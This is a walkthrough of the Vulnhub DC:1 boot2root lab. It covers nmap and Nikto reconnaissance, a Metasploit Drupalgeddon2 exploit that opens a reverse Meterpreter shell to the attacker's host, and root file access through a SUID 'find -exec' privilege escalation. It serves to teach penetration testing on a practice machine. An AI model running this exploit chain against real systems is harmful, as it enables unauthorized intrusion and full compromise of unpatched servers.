DC: 1 Hacking Challenge Walkthrough (Vulnhub)

  •  
  •  
  •  
  • 2
  •  
  •  
  •  
    2
    Shares

Today we will be cracking a boot2root machine which has been recently added to vulnhub i.e. DC:1. According to author, there are multiple ways of completing this challenge and he has, indeed, added some flags for clues. Our ultimate goal is to read the flag in /root directory. Fair enough! Lets dig it.

 Setup and Configurations

You can download the VM from the vulnhub website. Run the VM in VirtualBox (or VMware player). I ran this VM at VirtualBox with Host-only Network Configurations.

You can configure Host-only Network in Virtualbox from File > Host Network Manager as shown below:

Finding the Target’s IP

As the very first step, we need to know our target’s ip address and we will use nmap for that.

[email protected]:~# nmap -sn 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-16 02:29 IST
Nmap scan report for 192.168.56.2
Host is up (0.00020s latency).
MAC Address: 08:00:27:1D:E3:5E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.4
Host is up (0.00039s latency).
MAC Address: 08:00:27:8C:20:D8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.09 seconds

We know that 192.168.56.1 and 192.168.56.2 are our virtualbox’s adapter and DHCP server’s ip address (as shown in Setup and Configuration). So our target is 192.168.56.4 .

Scanning and Exploitation

Lets scan the open ports and services running on our target machine with our favorite scanner Nmap.

[email protected]:~# nmap -A 192.168.56.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-17 23:39 IST
Nmap scan report for 192.168.56.4
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo: 
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 48592/tcp status
|_ 100024 1 48831/udp status
MAC Address: 08:00:27:8C:20:D8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.56.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.53 seconds

So our target machine is listening at three ports :- 22, 80 and 111. So lets first look into the web server and and an interesting file robots.txt. The home page only contains one login form and two links.

I looked into robots.txt. It has 36 disallowed entries. There were many interesting entries(like install.php, upgrade.php, License.txt) and I visited each of the listed entries but could not find anything which could take us further. Either I was not authorized to view them or the one which i could able to view were not of any help. I played around with login and other pages but i could not find a way.

I then used Nikto looking for some success but that too shattered my hopes. All i got from Nikto was to look into robots.txt entries which i already did!

[email protected]:~# nikto -h 192.168.56.4
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.4
+ Target Hostname: 192.168.56.4
+ Target Port: 80
+ Start Time: 2019-05-16 03:37:32 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Retrieved x-powered-by header: PHP/5.4.45-0+deb7u14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 152289, size: 1561, mtime: Thu Nov 21 02:15:59 2013
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /user/: This might be interesting...
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /README: README file found.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 9194 requests: 0 error(s) and 42 item(s) reported on remote host
+ End Time: 2019-05-16 04:07:38 (GMT5.5) (1806 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

What to do next! I thought of checking other ports but before that i just searched Drupal 7 vulnerabilities on google and Whoa! multiple vulnerabilities :-O in 7.x versions of Drupal. I immediately fired up metasploit framework and searched Drupal 7.

msf > search Drupal
[!] Module database cache not built yet, using slow search

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Drupal CODER Module Remote Command Execution
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Drupal Drupalgeddon 2 Forms API Property Injection
exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Drupal RESTWS Module Remote PHP Code Execution
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution

Uhh! drupal_drupageddon2 seams interesting and it is latest, lets try this!

msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no If output should be dumped
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 Automatic (PHP In-Memory)

Set the remote host (RHOST) to our target machine and exploit.

msf exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.56.4
RHOST => 192.168.56.4
msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Drupal 7 targeted at http://192.168.56.4/
[-] Could not determine Drupal patch level
[*] Sending stage (37775 bytes) to 192.168.56.4
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.4:43042) at 2019-05-18 00:52:45 +0530

meterpreter >

And Yes! We got a meterpreter session. So the very first thing we will do is to have a good tty shell with Python.

meterpreter > shell
Process 3378 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/var/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

So we are logged in as www-data user. Still we need root privileges to view flag in /root directory. Lets search for a program with setuid bit on (as we did in Mr Robot Walk through )!

[email protected]:/var/www$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

So we have found a program with setuid bit on! Lets use this to view the /root directory. Now here you should have the knowledge of Linux command line. Now with find command, one can perform user defined actions using -ok or -exec. We will use -exec to execute arbitrary commands with find.

First , we will list /root directory to find out the name of our flag file.

www-d[email protected]:/var/www$ find /root -type f -exec ls '{}' \;
find /root -type f -exec ls '{}' \;
/root/.profile
/root/.drush/drush.complete.sh
/root/.drush/drush.prompt.sh
/root/.drush/cache/download/https---updates.drupal.org-release-history-views-7.x
/root/.drush/cache/download/https---ftp.drupal.org-files-projects-views-7.x-3.20.tar.gz
/root/.drush/cache/download/https---updates.drupal.org-release-history-drupal-7.x
/root/.drush/cache/download/https---ftp.drupal.org-files-projects-ctools-7.x-1.15.tar.gz
/root/.drush/cache/download/https---updates.drupal.org-release-history-ctools-7.x
/root/.drush/cache/download/https---ftp.drupal.org-files-projects-drupal-7.24.tar.gz
/root/.drush/drushrc.php
/root/.drush/drush.bashrc
/root/thefinalflag.txt
/root/.bash_history
/root/.bashrc
/root/.aptitude/config

So thefinalflag.txt is the desired file. Lets see its content.

[email protected]:/var/www$ find /root -name 'thefinalflag.txt' -exec cat '{}' ';'
<d /root -name 'thefinalflag.txt' -exec cat '{}' ';' 
Well done!!!!

Want to learn more about ethical hacking?

We have a  networking hacking course that is of a similar level to OSCP, get an exclusive 95% discount HERE

 

The following two tabs change content below.
Avatar

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]
Avatar

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

Do NOT follow this link or you will be banned from the site!